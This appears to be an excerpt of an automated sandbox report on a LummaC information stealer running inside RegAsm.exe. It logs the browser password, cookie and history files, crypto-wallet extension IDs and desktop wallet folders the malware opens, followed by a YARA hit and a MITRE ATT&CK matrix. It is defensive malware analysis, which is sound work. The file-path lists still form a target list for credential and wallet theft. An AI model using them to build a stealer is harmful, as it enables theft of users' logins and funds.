Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	21 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
